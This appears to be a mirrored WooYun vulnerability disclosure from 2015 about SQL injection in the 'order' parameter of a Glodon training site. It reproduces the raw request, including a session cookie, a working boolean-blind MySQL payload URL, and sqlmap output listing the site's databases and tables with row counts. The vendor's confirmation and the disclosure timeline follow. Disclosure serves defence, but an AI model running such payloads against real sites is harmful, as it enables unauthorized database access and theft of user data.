乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-22: 厂商已经确认,细节仅向厂商公开 2016-01-01: 细节向核心白帽子及相关领域专家公开 2016-01-11: 细节向普通白帽子公开 2016-01-21: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
看见厂商说送礼物 瞬间有了动力
虽然活动结束了 但是 用户信息却留下了····
GET /courses?order=*&page=3 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://haosy.glodon.com:80/Cookie: _rails_ds2015_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTA4MWNkYzQzYzllNDRjNzVjMGI0Y2M4ZjgwYTFiYjdmBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMU9sUkNFVGZ0NXpWUkR4dWtETkIxSlZTVDQyUGhENHRaMTZodGRETjJSQXM9BjsARkkiE3VzZXJfcmV0dXJuX3RvBjsARiIRL2NvdXJzZXMvMjU0--c096628d995d45729926319bff7b8cc0a3068a4eHost: haosy.glodon.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 order 可注入
Database: ds2015_production+---------------------------+---------+| Table | Entries |+---------------------------+---------+| score_logs | 2046715 || vote_logs | 1421749 || fight_papers | 417146 || papers | 194765 || course_logs | 53751 || exam_specialty_statistics | 39498 || users | 36065 || fight_exams | 33924 || sign_ins | 24789 || download_logs | 23317 || scores | 13116 || yyc_statistics | 12528 || game_chances | 11859 || exams | 7793 || notices | 4377 || zones | 3218 || yysz_statistic_details | 2941 || questions | 2496 || comments | 1544 || assets | 1335 || projects | 1205 || articles | 1055 || videos | 679 || administrator_affiliates | 553 || courses | 306 || permission_events | 88 || events | 83 || administrators | 73 || administrator_permissions | 64 || award_records | 63 || sessions | 41 || affiliates | 40 || awards | 39 || question_files | 26 || chapters | 11 || official_materials | 10 || areas | 7 || games | 4 || permissions | 3 || announcements | 2 || youku_tokens | 1 |+---------------------------+---------+[13:52:28] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2366 times, 502 (Bad Gateway) - 31 times[13:52:28] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\haosy.glodon.com'[*] shutting down at 13:52:28
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://haosy.glodon.com:80/courses?order=(SELECT (CASE WHEN (4871=4871) THEN 4871 ELSE 4871*(SELECT 4871 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&page=3---[13:16:22] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[13:16:22] [INFO] fetching database names[13:16:22] [INFO] fetching number of databases[13:16:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:16:22] [INFO] retrieved: 2[13:16:26] [INFO] retrieved:[13:16:30] [INFO] heuristics detected web page charset 'ascii'information_schema[13:17:50] [INFO] retrieved: ds2015_productionavailable databases [2]:[*] ds2015_production[*] information_schema[13:19:25] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 162 times, 502 (Bad Gateway) - 1 times[13:19:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\haosy.glodon.com'[*] shutting down at 13:19:25
危害等级:高
漏洞Rank:15
确认时间:2015-12-22 14:31
我们正在处理中,感谢提交的漏洞。
暂无